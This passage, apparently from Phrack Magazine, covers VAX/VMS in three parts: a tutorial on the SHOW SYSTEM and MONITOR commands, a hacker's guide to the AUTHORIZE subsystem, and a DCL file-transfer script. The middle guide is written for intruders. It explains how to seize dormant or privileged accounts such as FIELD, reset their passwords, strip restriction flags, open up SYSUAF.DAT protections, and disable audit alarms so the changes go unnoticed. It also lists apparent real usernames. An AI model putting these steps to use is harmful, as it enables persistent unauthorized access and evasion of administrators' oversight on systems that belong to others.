  10441.        274034EA MORDRED        LEF    4     2132  0 00:00:23.85   5318    452
  10442.        274022EB S. Whiplash    CUR  6 4      492  0 00:00:12.15   5181    459
  10443.        274018EF DwMail         LEF    5   121386  0 00:28:00.97   7233   4094
  10444.        27401AF0 EMACS$RTA43    LEF    4    14727  0 00:03:56.54   8411   4224 S
  10445.        27400CF4 TRISTRAM       HIB    5    25104  0 00:06:07.76  37407   1923
  10446.        274020F5 Morgan         LEF    7    14726  0 00:02:10.74  34262   1669
  10447.        27400CF6 mr. mike       LEF    9    40637  0 00:05:15.63  18454    463
  10448.  
  10449.            The information in this example includes the following:
  10450.  
  10451.             o Process identification (PID) code-A 32-bit binary value that
  10452.               uniquely identifies a process.
  10453.  
  10454.             o Process name-A 1- to 15-character string used to identify a
  10455.               process.
  10456.  
  10457.             o Process state-The activity level of the process, such as COM
  10458.               (computing), HIB (hibernation), LEF (local event flag) wait,
  10459.               or CUR (if the process is current). If a multiprocessing
  10460.               environment exists, the display shows the CPU ID of the
  10461.               processor on which any current process is executing.
  10462.  
  10463.               Note that the SHOW SYSTEM command examines the processes on
  10464.               the system without stopping activity on the system. In this
  10465.               example process information changed during the time that the
  10466.               SHOW SYSTEM command collected the data to be displayed. As
  10467.               a result, this display includes two processes, named GAWAIN
  10468.               and S. Whiplash, with the state CUR on the same CPU, CPU ID
  10469.               6 in the example.
  10470.  
  10471.             o Current priority-The priority level assigned to the process
  10472.               (the higher the number, the higher the priority).
  10473.  
  10474.             o Total process I/O count-The number of I/O operations
  10475.               involved in executing the process. This consists of both
  10476.               the direct I/O count and the buffered I/O count.
  10477.  
  10478.             o Charged CPU time-The amount of CPU time that a process has
  10479.               used thus far.
  10480.  
  10481.             o Number of page faults-The number of exceptions generated by
  10482.               references to pages that are not in the process's working
  10483.               set.
  10484.  
  10485.             o Physical memory occupied-The amount of space in physical
  10486.               memory that the process is currently occupying.
  10487.  
  10488.             o Process indicator-Letter B indicates a batch job; letter
  10489.               S indicates a subprocess; letter N indicates a network
  10490.               process.
  10491.  
  10492.             o User identification code (UIC)-An 8-digit octal number
  10493.               assigned to a process. This number is displayed only if the
  10494.               /FULL qualifier is specified.
  10495.  
  10496.  
  10497.  
  10498.          2.  $ SHOW SYSTEM /CLUSTER
  10499.  
  10500.  
  10501.        VAX/VMS V5.4 on node APPLE 19-APR-1990 09:09:58.61  Uptime    0 2:27:11
  10502.        Pid       Process Name   State  Pri I/O  CPU           Page flts Ph. Mem
  10503.        31E00041  SWAPPER        HIB    16    0  0 00:00:02.42     0       0
  10504.        31E00047  CACHE_SERVER   HIB    16   58  0 00:00:00.26    80      36
  10505.        31E00048  CLUSTER_SERVER CUR     9  156  0 00:00:58.15  1168      90
  10506.        31E00049  OPCOM          HIB     7 8007  0 00:00:33.46  5506     305
  10507.        31E0004A  AUDIT_SERVER   HIB     9  651  0 00:00:21.17  2267      22
  10508.        31E0004B  JOB_CONTROL    HIB    10 1030  0 00:00:11.02   795     202
  10509.  
  10510.           .
  10511.           .
  10512.  
  10513.            The SHOW SYSTEM command in this example shows all processes on
  10514.            all nodes of the cluster.
  10515.  
  10516.  
  10517.          3.  $ SHOW SYSTEM /NODE=NEON
  10518.        VAX/VMS V5.4 on node NEON 19-APR-1990 09:19:15.33  Uptime    0 02:29:07
  10519.        Pid       Process Name   State  Pri  I/O  CPU           Page flts Ph. Mem
  10520.        36200041  SWAPPER        HIB    16     0  0 00:00:12.03     0       0
  10521.        36200046  ERRFMT         HIB     8   263  0 00:00:05.89   152      87
  10522.        36200047  CACHE_SERVER   CUR    16     9  0 00:00:00.26    80      51
  10523.        36200048  CLUSTER_SERVER CUR     8    94  0 00:00:30.07   340      68
  10524.        36200049  OPCOM          HIB     6  2188  0 00:02:01.04  1999     177
  10525.        3620004A  AUDIT_SERVER   HIB    10   346  0 00:00:10.42  1707      72
  10526.           .
  10527.           .
  10528.           .
  10529.  
  10530.  
  10531.            The SHOW SYSTEM command in this example shows all processes on
  10532.            the node NEON.
  10533.  
  10534.  
  10535.                                ----- X -----
  10536.  
  10537.    So now that we beat the SHOW SYSTEM command to death, lets take on another
  10538.    command. Hmmm..let's see..Ahhhaaaa the MONITOR SYSTEM !!!!!
  10539.  
  10540.    This is a pretty neat command and one of my favorite "play" commands. Don't
  10541.    get me wrong, there's a lot to be learned from "play" commands like these.
  10542.    It really gives us some useful information. The reason why I like this
  10543.    utility is because it gives a GRAPHICAL representation of the
  10544.    data given by the SHOW SYSTEM. I would have included a short example
  10545.    of the graphics, but not everyone receiving this article would be running
  10546.    VMS on a terminal with ANSI emulation. So, if you want to see the ANSI
  10547.    graphics, follow my instructions...
  10548.  
  10549.  
  10550. MONITOR
  10551.  
  10552.    Invokes  the  VMS  Monitor  Utility  (MONITOR)  to  monitor  classes  of
  10553.    system-wide  performance  data   at  a  specified  interval.  It produces
  10554.    three types of optional output:
  10555.  
  10556.       o  Recording file
  10557.       o  Statistical terminal display
  10558.       o  Statistical summary file
  10559.  
  10560.    You  can collect data from a running system or from a previously created
  10561.    recording file.
  10562.  
  10563.    You can execute a single  MONITOR request,  or enter MONITOR interactive
  10564.    mode to execute a series of requests.  Interactive mode is entered  when
  10565.    the MONITOR command is issued with no parameters or qualifiers.
  10566.  
  10567.    A MONITOR request can be terminated by pressing CTRL/C or CTRL/Z. CTRL/C
  10568.    causes MONITOR to enter interactive mode; CTRL/Z returns to DCL.
  10569.  
  10570.  
  10571.    The  MONITOR  Utility  is described in detail in the VMS Monitor Utility
  10572.    Manual.
  10573.  
  10574.    Format:
  10575.           MONITOR  class-name[,...]
  10576.  
  10577.    There are quite a few different options available for the MONITOR utility.
  10578.    We are not going to get into too much detail about each option, but I will
  10579.    take the time to discuss a few. The different options for MONITOR are....
  10580.  
  10581.   ALL_CLASSES           CLUSTER    DECNET     DISK       DLOCK      FCP
  10582.   FILE_SYSTEM_CACHE     IO         LOCK       MODES      MSCP_SERVER
  10583.   PAGE       POOL       PROCESSES  RMS        SCS        STATES     SYSTEM
  10584.   TRANSACTION           VECTOR
  10585.   /BEGINNING /BY_NODE   /COMMENT   /DISPLAY   /ENDING    /FLUSH_INTERVAL
  10586.   /INPUT     /INTERVAL  /NODE      /RECORD    /SUMMARY   /VIEWING_TIME
  10587.   /ALL       /AVERAGE   /CPU       /CURRENT   /FILE      /ITEM      /MAXIMUM
  10588.  
  10589.  
  10590.      MONITOR Parameter class-name[,...]
  10591.  
  10592.       Specifies one or more classes of performance data to be monitored.
  10593.       The available class-names are:
  10594.  
  10595.           ALL_CLASSES       All MONITOR classes.
  10596.           CLUSTER           Cluster wide information.
  10597.           DECNET            DECnet-VAX statistics.
  10598.           DISK              Disk I/O statistics.
  10599.           DLOCK             Distributed lock management statistics
  10600.           FCP               File system primitive statistics.
  10601.           FILE_SYSTEM_CACHE File system caching statistics.
  10602.           IO                System I/O statistics.
  10603.           LOCK              Lock management statistics.
  10604.           MODES             Time spent in each of the processor modes.
  10605.           MSCP_SERVER       MSCP Server statistics
  10606.           PAGE              Page management statistics.
  10607.           POOL              Space allocation in the nonpaged dynamic pool.
  10608.           PROCESSES         Statistics on all processes.
  10609.           RMS               VMS Record Management Services statistics
  10610.           SCS               System communication services statistics.
  10611.           STATES            Number of processes in each scheduler state.
  10612.           SYSTEM            System statistics.
  10613.           TRANSACTION       DECdtm services statistics.
  10614.           VECTOR            Vector Processor scheduled usage.
  10615.  
  10616.  
  10617. MONITOR
  10618.  
  10619.   /ALL
  10620.  
  10621.    Specifies that a table of current, average, minimum, and  maximum
  10622.    statistics is to be included in display and summary output.
  10623.  
  10624.    /ALL is the  default for all class-names except MODES, STATES and
  10625.    SYSTEM. It may not be used with the PROCESSES class-name.
  10626.  
  10627.  
  10628.                          ---- X ----
  10629.  
  10630.      Well, I hope this little file helps a few people out, by providing them
  10631.  with a better understanding of the background processes running on the system
  10632.  and by providing a better perception of the amount of CPU and I/O time taken
  10633.  by each process.
  10634.  
  10635.  
  10636.  
  10637.  
  10638. DARTH VADER
  10639.  
  10640.  
  10641. P.S : Look for a file on ACL (Access Control Listing) in the near future.
  10642.  
  10643. ------------------------------------------------------------------------------
  10644.  
  10645.                         ----------------------------
  10646.                         VAX/VMS AUTHORIZATION SYSTEM
  10647.                         ----------------------------
  10648.  
  10649. Introduction:
  10650. ------------
  10651.  
  10652. Well, since Phrack issues containing VMS articles are pretty rare I will
  10653. examine in deep the authorization sub-system on VAXes.
  10654.  
  10655. Keep in mind that I will take under consideration that you are probably
  10656. under some new VMS version (5.5-X). If you are on some older VMS, don't
  10657. worry, commands are the same, just some flags and display was added on
  10658. later versions.  The knowledge of the authorization sub-system is of great
  10659. importance for a VAX hacker since he must keep himself an access to the
  10660. system, and this is the right way to do it.
  10661.  
  10662. Also keep in mind that this is just a practical guide oriented to a hacker's
  10663. needs and was done to be understandable by and useable by everybody,
  10664. even those who are not so familiar with VMS. That's why I included some
  10665. references to VMS filesystem, privileges, etc.
  10666.  
  10667. AUTHORIZE:
  10668. ---------
  10669.  
  10670. The authorization subsystem is the one that will let you create accounts
  10671. under the VMS operating system. The command you need to execute is the:
  10672.  
  10673.                         SYS$SYSTEM:AUTHORIZE.EXE
  10674.  
  10675. What do you need to execute that program ?
  10676.  
  10677.                         READ/WRITE PRIVS over SYSUAF.DAT
  10678.                         EXECUTE PRIVS    over SYS$SYSTEM:AUTHORIZE.EXE
  10679.  
  10680. How can you check if you got all needed to start creating accounts ?
  10681.  
  10682. DIR SYS$SYSTEM:AUTHORIZE.EXE/FULL
  10683.  
  10684. Directory SYS$SYSROOT:[SYSEXE] <----- Directory you are listing
  10685.  
  10686. AUTHORIZE.EXE;1               File ID:  (2491,5,0)
  10687. Size:          164/165        Owner:    [SYSTEM] <---- Owner is Sys Manager
  10688. Created:  20-JUL-1990 08:30:34.18  <------- Creation Date of program
  10689. Revised:  17-AUG-1992 09:45:36.31 (4) <------ Last modification over program
  10690. Expires:   <None specified>    <---- No expiration, will last for ever
  10691. Backup:    <No backup recorded>
  10692. File organization:  Sequential
  10693. File attributes:    Allocation: 165, Extend: 0, Global buffer count: 0
  10694.                     No version limit, Contiguous best try
  10695. Record format:      Fixed length 512 byte records <--- record organization
  10696. Record attributes:  None
  10697. RMS attributes:     None
  10698. Journaling enabled: None
  10699. File protection:    System:RWED, Owner:RWED, Group:R, World: <---- (*)
  10700. Access Cntrl List:  None
  10701. Total of 1 file, 164/165 blocks.
  10702.  
  10703. (*) This is the field that will tell if you are authorized to execute the
  10704.     program. In this case if you own a privileged account you
  10705.     can run it. That doesn't mean that you will be able to view/modify
  10706.     any account found on the SYSUAF.DAT. But 95 % of the time any user
  10707.     can execute the AUTHORIZE program even if you don't have READ privilege
  10708.     on the SYS$SYSTEM directory. That means that if you do a :
  10709.  
  10710.     DIR SYS$SYSTEM
  10711.  
  10712.     and you find that you don't have the privilege to view the files contained
  10713.     in that directory you may still be able to execute the AUTHORIZATION
  10714.     subsystem, of course, you have a real low chance of getting the SYSUAF.DAT
  10715.     read or modified.
  10716.  
  10717. If you find that the authorize program cannot be executed a good method is
  10718. to send it UUENCODED from another VAX where you *DO* have at least read access
  10719. to SYS$SYSTEM:AUTHORIZE.EXE . If you are working on the X-25's you can send
  10720. it via PSI mailing. If you are on the Internet, just send it using the
  10721. normal mail routing method to the user on the VAX you want the AUTHORIZE.EXE
  10722. to get executed by.  Once you get it just UUDECODE it and place it in your
  10723. SYS$LOGIN directory and execute it!.
  10724.  
  10725. The authorize will work as a module, and won't try to overlay any other module
  10726. to make it work correctly.  If you can run the authorize you should receive :
  10727.  
  10728. "UAF>" prompt.
  10729.  
  10730. THE SYSUAF.DAT:
  10731. --------------
  10732.  
  10733. The SYSUAF.DAT is the most important file of the authorization subsystem.
  10734. All the accounts are stored here with their :
  10735.  
  10736.         - PASSWORDS     (encrypted)
  10737.         - ENVIRONMENT
  10738.         - DIR
  10739.         - privileges
  10740.         - RIGHTS OVER THE FILES
  10741.         ... and more
  10742.  
  10743. The SYSUAF.DAT is somehow like the /etc/passwd file on Unix OS.
  10744. Under UNIX you can take the password file and with an editor add yourself
  10745. an account or modify an existing one without problem. Well this is not
  10746. possible under VMS. You need a program that knows SYSUAF.DAT record structure
  10747. (like AUTHORIZE) to take action over accounting system.
  10748.  
  10749. The main difference is that the SYSUAF.DAT is not a PLAIN TEXT FILE, its
  10750. a binary file structured to be read only by the AUTHORIZE program.
  10751. Another main difference is that is not world readable, can usually be only
  10752. read from high privileged accounts or from accounts which can override
  10753. system protection flags (will talk about this later).
  10754.  
  10755. The SYSUAF.DAT can be found in the same directory as the AUTHORIZE.EXE
  10756. program, the SYS$SYSTEM. You will usually find a few versions of this file
  10757. but normally with the same protections as the working one.
  10758. What can be interesting is that you can usually find files produced by the
  10759. output of the LIST command (under AUTHORIZE) which can be WORLD readable where
  10760. you will have all the accounts listed with the OWNER/DIR/PRIVS..etc. That will
  10761. help you a lot to try to hack some accounts if you still can't run authorize.
  10762. Those files are called normally: SYSUAF.LIS, and you might find more than
  10763. just one of them. Of course try to get the latest one since the older
  10764. ones will contain some expired/deleted accounts.
  10765.  
  10766. To check what privilege you have over the SYSUAF.DAT issue :
  10767.  
  10768. DIR SYS$SYSTEM:SYSUAF.DAT/FULL
  10769.  
  10770. Directory SYS$COMMON:[SYSEXE]
  10771. SYSUAF.DAT;1                  File ID:  (228,1,0)
  10772. Size:          183/183        Owner:    [SYSTEM]
  10773. Created:  20-JUL-1990 08:30:21.50
  10774. Revised:  14-JAN-1994 03:33:27.75 (34812) <--- Last Creation/Modification
  10775. Expires:   <None specified>
  10776. Backup:    <No backup recorded>
  10777. File organization:  Indexed, Prolog: 3, Using 4 keys
  10778.                              In 3 areas
  10779. File attributes:    Allocation: 183, Extend: 3, Maximum bucket size: 3
  10780.                     Global buffer count: 0, No version limit
  10781.                     Contiguous best try
  10782. Record format:      Variable length, maximum 1412 bytes
  10783. Record attributes:  None
  10784. RMS attributes:     None
  10785. Journaling enabled: None
  10786. File protection:    System:RWED, Owner:RWED, Group:R, World: (*)
  10787. Access Cntrl List:  None
  10788.  
  10789. Total of 1 file, 183/183 blocks.
  10790.  
  10791. In this case, if you are under a standard user account you won't be
  10792. able to READ or/and WRITE the SYSUAF.DAT.  So when you will execute the
  10793. AUTHORIZE program, it will quit and kick you back to shell.
  10794. IF you have World : R, you will be able to  LIST/SHOW     accounts.
  10795. IF you have World : RW, you will be able to CREATE/MODIFY accounts.
  10796.  
  10797. But if you happen to have SYSPRIV you will be able CREATE/MODIFY the
  10798. SYSUAF.DAT at your pleasure!  Since you can override the system protection
  10799. that has been imposed over that file.  Of course, if you have SETPRV
  10800. privilege you have ALL privilege, and you can do whatever you want
  10801. with the VAX.
  10802.  
  10803. Privileges needed to CREATE/MODIFY accounts :
  10804.  
  10805. Process privileges:
  10806. *SETPRV               may set any privilege bit
  10807. Explanation: With this only you can assign yourself all the privileges you
  10808. need with a SET PROC/PRIVS=ALL.
  10809.  
  10810. *SYSPRV               may access objects via system protection
  10811. Explanation: If you have this one you will be able to read the SYSUAF.DAT.
  10812.  
  10813. *BYPASS               may bypass all object access controls
  10814. Explanation: If you have this one you can read the SYSUAF.DAT since
  10815. all the objects (ie:files) will be made accessible to you. I suggest that
  10816. if you happen to have some problems, change the files access flags to
  10817. let it be WORLD (you) readable/writable. So use :
  10818.  
  10819.                  SET FILE/PROT=(w:rwed) SYS$SYSTEM:SYSUAF.DAT
  10820.  
  10821. *READALL              may read anything as the owner
  10822. Explanation:  Well this is obvious, SYSUAF.DAT will be read without problems
  10823. but of course you won't be able to CREATE/MODIFY accounts to your pleasure.
  10824. At least you can LIST/SHOW all the accounts as deep as you want.
  10825.  
  10826. Entering AUTHORIZE:
  10827. ------------------
  10828. Once you've executed AUTHORIZE you will receive its main prompt:
  10829.  
  10830. RUN SYS$SYSTEM:AUTHORIZE
  10831.  
  10832. UAF>
  10833.  
  10834. UAF stands for User Authorization File.
  10835.  
  10836. First of all you will first need to get a list of all the accounts on the
  10837. system with some of their settings also. To do this issue the command:
  10838.  
  10839. UAF>SHOW USERS/BRIEF
  10840.  
  10841.        Owner         Username           UIC       Account  Privs Pri Directory
  10842.  
  10843. ALLIN1V24CREATED     A1$XFER_IN      [660,1]               Normal  4 Disuser
  10844. ALLIN1V24CREATED     A1$XFER_OUT     [660,2]               Normal  4 Disuser
  10845. JOHN_FAVORITE        JFAVORITE       [300,2]      LEDGER   Devour  4 DEV$DUA2
  10846. :[ABDURAHMAN]
  10847.  
  10848. IBRAHIM ALBHIR       ALBHIR           [60,111]    GOTVOT   Normal  4 DUA2:[ALB
  10849. HIR]
  10850.  
  10851. ALGHAMDI             ALGHAMDI        [300,1]      LEDGER   Normal  4 DUA2:[ALG
  10852. HAMDI]
  10853.  
  10854. ALHAJAJ              ALHAJAJ         [325,3]      BUDGET   Devour  4 GOTDEV$DU
  10855. A2
  10856.  
  10857. Explanation:
  10858.  
  10859. 1) Owner: Owner of the account
  10860.  
  10861. 2) Username: This is the guy's login name
  10862.  
  10863. 3) UIC: User Identification Code. This serves to the OS to recognize you and
  10864.         rights you have over files, directory, etc.
  10865.  
  10866. 4) Account: This is to let the operator know what the group is
  10867.             that owns/manages the account.
  10868.  
  10869. 5) Pri: don't worry about it.
  10870.  
  10871. 6) Directory: This is the account HOME directory. Where the owner of the
  10872.               account will work on.
  10873.  
  10874. After you have captured the output of the SHOW command you can start
  10875. trying to create yourself some accounts by modifying some already existing
  10876. ones (which I suggest strongly).
  10877.  
  10878. To create an account issue the following command :
  10879.  
  10880. CREATE JOHN/DIR=JOHNS_DIR/DEVICE=SYS$USER/PASSWORD=JOHNS_PASSWORD
  10881. /ACCESS=(DIALUP,NETWORK)/PRIVS=(NETMBX,TMPMBX)/DEFPRIVS=(NETMBX,TMPMBX)
  10882. /ACCOUNT=USERS/OWNER=JOHN
  10883.  
  10884. Effects of this command:
  10885.  
  10886. Will create a user called JOHN which will log under the JOHNS_DIR directory,
  10887. who will have just normal user privileges (TMPMBX/NETMBX) who, when listed,
  10888. will appear to be as part of the group name USERS and the account's owner
  10889. will be JOHN.
  10890.  
  10891. After you issue this command a NEW UIC will be added to the RIGHTSLIST.DAT
  10892. file being assigned to your user.
  10893.  
  10894. Explanation:
  10895.  
  10896. DIR: can be any directory name you saw on the system. Of course if you are
  10897. not using all the privileges, check that its READ/WRITE-able
  10898. so you won't have problems at login.
  10899.  
  10900. DEVICE: is where the DIR can be found. That means that you have to tell in
  10901. which physical/logical device that directory will be found. Since VAXes will
  10902. have at least 1 or 2 magnetic supports you must say on which one the directory
  10903. can be found. Normally they already have some logical names assigned like
  10904. SYS$USER,SYS$SYSTEM,SYS$SPECIFIC,SYS$MANAGER, etc.
  10905.  
  10906. PASSWORD: is the password you want for the account which will never be shown
  10907. to anyone, so use whatever one you like.
  10908.  
  10909. ACCESS: tells the system from where you will authorize logins for this
  10910. account. For example I'm sure you've seen this message:
  10911.  
  10912. Username: BACKUP
  10913. Password:
  10914. Cannot login from this source.
  10915.  
  10916. Well this is the result of an account being setup with the DIALUP flags in
  10917. the access field as NODIALUP.
  10918.  
  10919. So if u want to give the account all kind of access just use :
  10920. ACCESS=ALL
  10921.  
  10922. and this will authorize all login sources for the account.
  10923.  
  10924. PRIVS: will setup the privileges on the named account. If you just want it
  10925. to be a normal user account use TMPMBX,NETMBX.  If you want it to be
  10926. a super-user account you can use ALL. But this is not the right way
  10927. if you don't want your account to get discovered fast.
  10928.  
  10929. Valid Process privileges:
  10930.  
  10931.  CMKRNL               may change mode to kernel
  10932.  CMEXEC               may change mode to exec
  10933.  SYSNAM               may insert in system logical name table
  10934.  GRPNAM               may insert in group logical name table
  10935.  ALLSPOOL             may allocate spooled device
  10936.  DETACH               may create detached processes
  10937.  DIAGNOSE             may diagnose devices
  10938.  LOG_IO               may do logical i/o
  10939.  GROUP                may affect other processes in same group
  10940.  ACNT                 may suppress accounting messages
  10941.  PRMCEB               may create permanent common event clusters
  10942.  PRMMBX               may create permanent mailbox
  10943.  PSWAPM               may change process swap mode
  10944.  ALTPRI               may set any priority value
  10945.  SETPRV               may set any privilege bit
  10946.  TMPMBX               may create temporary mailbox
  10947.  WORLD                may affect other processes in the world
  10948.  MOUNT                may execute mount acp function
  10949.  OPER                 may perform operator functions
  10950.  EXQUOTA              may exceed disk quota
  10951.  NETMBX               may create network device
  10952.  VOLPRO               may override volume protection
  10953.  PHY_IO               may do physical i/o
  10954.  BUGCHK               may make bug check log entries
  10955.  PRMGBL               may create permanent global sections
  10956.  SYSGBL               may create system wide global sections
  10957.  PFNMAP               may map to specific physical pages
  10958.  SHMEM                may create/delete objects in shared memory
  10959.  SYSPRV               may access objects via system protection
  10960.  BYPASS               may bypass all object access controls
  10961.  SYSLCK               may lock system wide resources
  10962.  SHARE                may assign channels to non-shared devices
  10963.  GRPPRV               may access group objects via system protection
  10964.  READALL              may read anything as the owner
  10965.  SECURITY             may perform security functions
  10966.  
  10967. Check the last section on tips on creating accounts.
  10968.  
  10969. ACCOUNT: this is pretty useless and is just for displaying purposes at the
  10970. SHOW USER under authorize.
  10971.  
  10972. OWNER: This field is also used just at SHOW time but keep in mind to use
  10973. an owner that won't catch the eye of the system manager.
  10974.  
  10975. You can use the MODIFY command the ame as you used the CREATE. The only
  10976. difference is that no account will be created but ALL types of modifications
  10977. will affect the specified account.
  10978.  
  10979. You can use the LIST command to produce an output of the accounts to a file.
  10980. Use this command as you use the SHOW one.
  10981.  
  10982. Of course, the authorize sub-system is so huge you can actually set hours of
  10983. login for users, expirations, disk quotas, etc., but this is not the purpose
  10984. of this article.
  10985.  
  10986. Tips to create accounts:
  10987. -----------------------
  10988. First of all, what I suggest strongly is to MODIFY accounts not to CREATE
  10989. new ones. Why this?  Well, new account names can jump out at the operator
  10990. and he will kick you off the system very soon.
  10991.  
  10992. The best way I think is to get a non-used account, change its privileges
  10993. and change the password and use it!.
  10994.  
  10995. First of all try to find a never-logged account or at least one account
  10996. whose last log comes from few months ago. From the UAF prompt just
  10997. do a SH USER/FULL and check out the dates that appear in the *Last Login*
  10998. record. If this happens to be a very old one then it can be marked as
  10999. valid to take control of. Of course you have to find a non used account
  11000. since you will have to change the account's password.
  11001.  
  11002. Check the flags field also. This flags can really bother you:
  11003.  
  11004.                             Captive     (worst one!)
  11005.                             Ctly        (ctrl-y deactivated)
  11006.                             Restricted  (OS does more checks than normal)
  11007.                             DisUser     (ACCOUNT IS NOT ENABLED!!!)
  11008.  
  11009. I suggest you take out all the flag's fields.
  11010. just issue: MODIFY JOHN/FLAGS=(NOCAPTIVE,NOCTLY,NORESTRICED,NODISUSER)
  11011. If you find an account that is DisUser I suggest not to own it since the
  11012. DisUser flags will take on when listing the accounts. If system manager
  11013. sees an account that was OFF now ON..well it's a bit suspicious don't
  11014. you think ?
  11015.  
  11016. Check if the FIELD account is being used. If not own this one since it
  11017. already has ALL privileges and will not look suspicious at all. Just change
  11018. its password.  (FIELD is the account normally used by Digital Engineers
  11019. to check the VAX).
  11020.  
  11021. Remember to check also that DIALUP access is permitted or you won't be able
  11022. to login your account.
  11023.  
  11024. Once you've chosen the perfect account you can now change its password.
  11025. Issue: MODIFY JOHN/PASSWORD=MY_PASSWORD. (John is the account name you found)
  11026.  
  11027. After you finished just type CTRL-Z and to exit. If you happen to logoff
  11028. without exiting AUTHORIZE, don't worry.  Changes to SYSUAF.DAT are done
  11029. instantly when the command finishes its execution.
  11030.  
  11031. One other advice, under SHELL if you happen to have SECURITY privilege
  11032. Issue: SET AUDIT/ALARM/DISABLE=(AUTHORIZE)
  11033.  
  11034. If you don't do this, each time you run AUTHORIZE, modified accounts will be
  11035. logged into OPERATOR.LOG so remember to do so.
  11036.  
  11037. After playing a bit with AUTHORIZE you won't have much problems understanding
  11038. it. Hope you have PHUN! ;-)
  11039.  
  11040. ------------------------------------------------------------------------------
  11041.  
  11042. $ ! FACILITY: Mailback     (MAILBACK.COM)
  11043. $ !
  11044. $ ! ABSTRACT: VAXVMS to VAXVMS file transfer, using the VAX/PSI_MAIL
  11045. $ !           utility of VAXPSI, over an X.25 link.
  11046. $ !
  11047. $ ! ENVIRONMENT: VAX/VMS operating system.
  11048. $ !
  11049. $! -------------------------------------------------------------------
  11050. $ saved_verify := 'f$verify(0)'
  11051. $ set noon
  11052. $ ws = "write sys$output"
  11053. $ ws ""
  11054. $ ws "   MAILBACK transfer utility V1.0 (via Backup and PSI_Mail) 21-May-1990"
  11055. $ ws ""
  11056. $!
  11057. $ if f$logical("debug").nes."" then set verify
  11058. $ ask_p1:
  11059. $ if P1.eqs."" then read/prompt="MailBack> Send or Receive (S/R) : " -
  11060.                     sys$command P1
  11061. $ P1 = f$edit(P1, "UPCASE,COMPRESS,TRIM")
  11062. $!
  11063. $!
  11064. $ if P1.EQS."" then exit 1+0*f$verify(saved_verify)
  11065. $ if P1.EQS."R" then goto receive_file
  11066. $ if P1.nes."S" then goto ask_P1
  11067. $! -------------------------------------------------------------------
  11068. $!
  11069. $! Sending File(s)
  11070. $! ===============
  11071. $ if P2.eqs. "" then -
  11072.      read/prompt="MailBack> Recipient mail address (PSI%nnn::user) : " -
  11073.      sys$command P2
  11074. $ if P2.eqs."" then exit 1+0*f$verify(saved_verify)
  11075. $!
  11076. $!
  11077. $ if P3.eqs."" then read/prompt="MailBack> File(s) : " sys$command P3
  11078. $!
  11079. $ ws "MailBack> ... Backuping the file(s) ..."
  11080. $ Backup/nolog 'P3' sys$scratch:mailbck.tmp/sav/block=2048
  11081. $!
  11082. $ ws "MailBack> ... Converting format ..."
  11083. $ convert/fdl=sys$input sys$scratch:mailbck.tmp sys$scratch:mailbck.tmp
  11084. record
  11085.  carriage_control carriage_return
  11086. $!
  11087. $ ws "MailBack> ... Sending a (PSI_)mail ..."
  11088. $ on warning then goto error_sending
  11089. $ mail/subject="MAILBACK Backup-File" -
  11090.       /noself sys$scratch:mailbck.tmp 'P2'
  11091. $ ws "MailBack> ... SEND command SUCCESSfully completed."
  11092. $!
  11093. $ fin_send:
  11094. $ delete = "delete"
  11095. $ delete/nolog/noconfirm sys$scratch:mailbck.tmp;,;
  11096. $ exit  1+0*f$verify(saved_verify)
  11097. $!
  11098. $ Error_sending:
  11099. $ ws "MailBack> Error detected while sending the mail ; ..."
  11100. $ ws "MailBack> ... Fix the problem, then retry the whole procedure."
  11101. $ goto fin_send
  11102. $! -------------------------------------------------------------------
  11103. $!
  11104. $! Inbound File(s) Processing
  11105. $! ==========================
  11106. $receive_file:
  11107. $!
  11108. $ if P2.eqs."" then -
  11109.      read/prompt="MailBack> Destination directory (<CR>= []) : " sys$command P2
  11110. $ if P2.eqs."" then p2 ="[]"
  11111. $!
  11112. $!
  11113. $!
  11114. $ if P3.eqs."" then -
  11115.      read/prompt="MailBack> Mail file (<CR>= default mail file) : " -
  11116.      sys$command P3
  11117. $ gosub build_file
  11118. $ ws "MailBack> ... Extracting a (PSI_)mail from the NEWMAIL folder ..."
  11119. $ define/exec sys$output nl:            ! ped 18-May-90 (wipe out mail displays)
  11120.  
  11121. $ if P3.eqs."" then goto normal_get
  11122. $ define/nolog new_mail_file 'p3'
  11123. $ define/user sys$command sys$input
  11124. $ set message/nofacility/noseverity/notext/noident
  11125. $ mail
  11126. set file new_mail_file
  11127. select NEWMAIL
  11128. sear MAILBACK Backup-File
  11129. extract/NOHEADER out_file
  11130. $ deassign new_mail_file
  11131. $ goto clean
  11132. $ if P3.nes."" then p2 ="[]"
  11133. $!
  11134. $!
  11135. $ normal_get:
  11136. $ define/user sys$command sys$input
  11137. $ set message/nofacility/noseverity/notext/noident
  11138. $ mail
  11139. select NEWMAIL
  11140. sear MAILBACK Backup-File
  11141. extract/NOHEADER out_file
  11142. $!
  11143. $ clean:
  11144. $ deassign sys$output                           !
  11145. $ set message/facility/severity/text/ident
  11146. $ if f$search("out_file") .eqs. "" then goto nomessage
  11147. $ on warning then goto error_conv
  11148. $ ws "MailBack> ... Converting format ..."
  11149. $ convert/fdl=sys$input out_file out_file /pad=%x00
  11150.  record
  11151.  format fixed
  11152.  carriage_control none
  11153.  size 2048
  11154. $!
  11155. $ ws "MailBack> ... Restoring file(s) from the backup saveset ..."
  11156. $ on warning then goto error_back
  11157. $ backup/nolog out_file/save 'P2'*.*
  11158. $!
  11159. $ delete = "delete"
  11160. $ delete/nolog/noconfirm  'file';,;
  11161. $ ws "MailBack> ... RECEIVE command SUCCESSfully completed."
  11162. $!
  11163. $ finish_r:
  11164. $ deassign out_file
  11165. $ exit  1+0*f$verify(saved_verify)
  11166. $! -------------------------------------------------------------------
  11167. $ error_conv:
  11168. $ ws "MailBack> " + -
  11169.      "An error occurred during the fdl convert of the extracted mail ;"
  11170. $ ws "MailBack> ... the file ''file' corresponds to " + -
  11171. $ ws "MailBack> ... the message extracted from Mail."
  11172. $ goto finish_r
  11173. $!
  11174. $ error_back:
  11175. $ ws "MailBack> An error occurred during the file restore phase with BACKUP ;"
  11176. $ ws "MailBack> ... the file ''file' corresponds to "
  11177. $ ws "MailBack> " + -
  11178.      "... the  message extracted from Mail, converted as a backup Saveset."
  11179. $ delete/nolog/noconfirm  'file';-1
  11180. $ goto finish_r
  11181. $!
  11182. $ nomessage:
  11183. $ ws "MailBack> No mail message has been found in the NEWMAIL folder."
  11184. $ goto finish_r
  11185. $!
  11186. $Build_file:                    ! Build a unique (temporary) file_name
  11187. $file = "sys$scratch:mail_" + f$cvtime(f$time(),,"month")+ -
  11188. f$cvtime(f$time(),,"day") + f$cvtime(f$time(),,"hour")+ -
  11189. f$cvtime(f$time(),,"minute")+ f$cvtime(f$time(),,"second") + ".tmp"
  11190. $define/nolog out_file 'file'
  11191. $return
  11192.                               ==Phrack Magazine==
  11193.  
